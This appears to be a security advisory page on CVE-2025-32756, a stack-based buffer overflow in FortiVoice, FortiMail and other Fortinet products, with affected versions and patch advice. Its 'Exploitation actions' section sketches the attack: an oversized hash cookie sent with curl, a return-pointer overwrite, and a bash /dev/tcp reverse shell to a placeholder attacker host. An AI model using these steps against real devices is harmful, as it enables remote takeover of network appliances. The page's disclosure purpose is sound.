Fortinet products: stack-based buffer overflow (CVE-2025-32756) #shorts
Summary
Fortinet has released a patch for CVE-2025-32756, a critical zero-day vulnerability that has been actively exploited in the wild to target FortiVoice systems and other Fortinet products. This flaw allows remote attackers to execute unauthorized code without authentication, posing significant risk to affected networks.
Product details
The vulnerability impacts several Fortinet products and versions: FortiVoice 7.2.0, 7.0.0–7.0.6, 6.4.0–6.4.10; FortiRecorder 7.2.0–7.2.3, 7.0.0–7.0.5, 6.4.0–6.4.5; FortiMail 7.6.0–7.6.2, 7.4.0–7.4.4, 7.2.0–7.2.7, 7.0.0–7.0.8; FortiNDR 7.6.0, 7.4.0–7.4.7, 7.2.0–7.2.4, 7.0.0–7.0.6; FortiCamera 2.1.0–2.1.3, all 2.0.x, 1.1.x.
Vulnerability type summary
CVE-2025-32756 is a stack-based buffer overflow (CWE-121) that enables remote, unauthenticated attackers to execute arbitrary code or commands on affected devices.
Details of the vulnerability
An attacker can exploit this flaw by sending specially crafted HTTP requests containing a malicious hash cookie to the web interface of an affected Fortinet product. The malformed cookie overflows a fixed-size buffer on the stack, overwriting control data and enabling the execution of attacker-supplied payloads with system privileges. Proof-of-concept exploits have already surfaced, and active exploitation has been observed in targeted attacks against FortiVoice systems.
Conclusion
Administrators should immediately apply the security updates released on May 13, 2025, for all impacted Fortinet products. Ensure that web interfaces are not exposed to untrusted networks, monitor logs for suspicious HTTP requests with abnormal cookies, and review your intrusion detection signatures to guard against exploitation attempts.
Watch the full video on YouTube: CVE-2025-32756
Remediation and exploitation details
This chain involves the following actors
- Remote Unauthenticated Attacker: Exploits public HTTP interface to gain code execution
- System Administrator: Installs patches and monitors systems
This following systems are involved
- FortiVoice (Voice over IP call management): Provides telephony and conferencing services
- FortiRecorder (Call recording and archiving): Stores and retrieves audio recordings
- FortiMail (Email security gateway): Filters and scans inbound and outbound mail
- FortiNDR (Network detection and response): Identifies and responds to threats in network traffic
- FortiCamera (Video surveillance): Streams and records security camera feeds
Attack entry point
- HTTP management endpoint: Publicly exposed web interface listening on port 80 or 443
- Hash cookie field: Session cookie parameter that is not properly bounds-checked
Remediation actions
Exploitation actions
Port and service discovery
- Use a network scanner to identify hosts with open TCP 80/443
Overflow the hash cookie buffer
- Set Cookie: hash=<2000+ byte payload>[shellcode][return address overwrite]
Send HTTP GET or POST with oversized cookie header
- curl -k -H "Cookie: hash=<overflow>" https://victim-ip/login
Buffer overflow control-flow hijack
- Overwrite saved return pointer to jump into injected shellcode
Spawn reverse shell or write backdoor
- Invoke system(“/bin/sh -i >& /dev/tcp/attacker/4444 0>&1”)
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://fortiguard.fortinet.com/psirt/FG-IR-25-254
- [2025-05-14] Fortinet has patched a critical zero-day vulnerability, CVE-2025-32756, exploited in attacks on FortiVoice systems.
- [2025-05-14] CVE-2025-32756, a stack-based buffer overflow affecting multiple Fortinet products, has been exploited in the wild.
- [2025-05-13] Fortinet patched a critical vulnerability (CVE-2025-32756) exploited in the wild to compromise FortiVoice systems.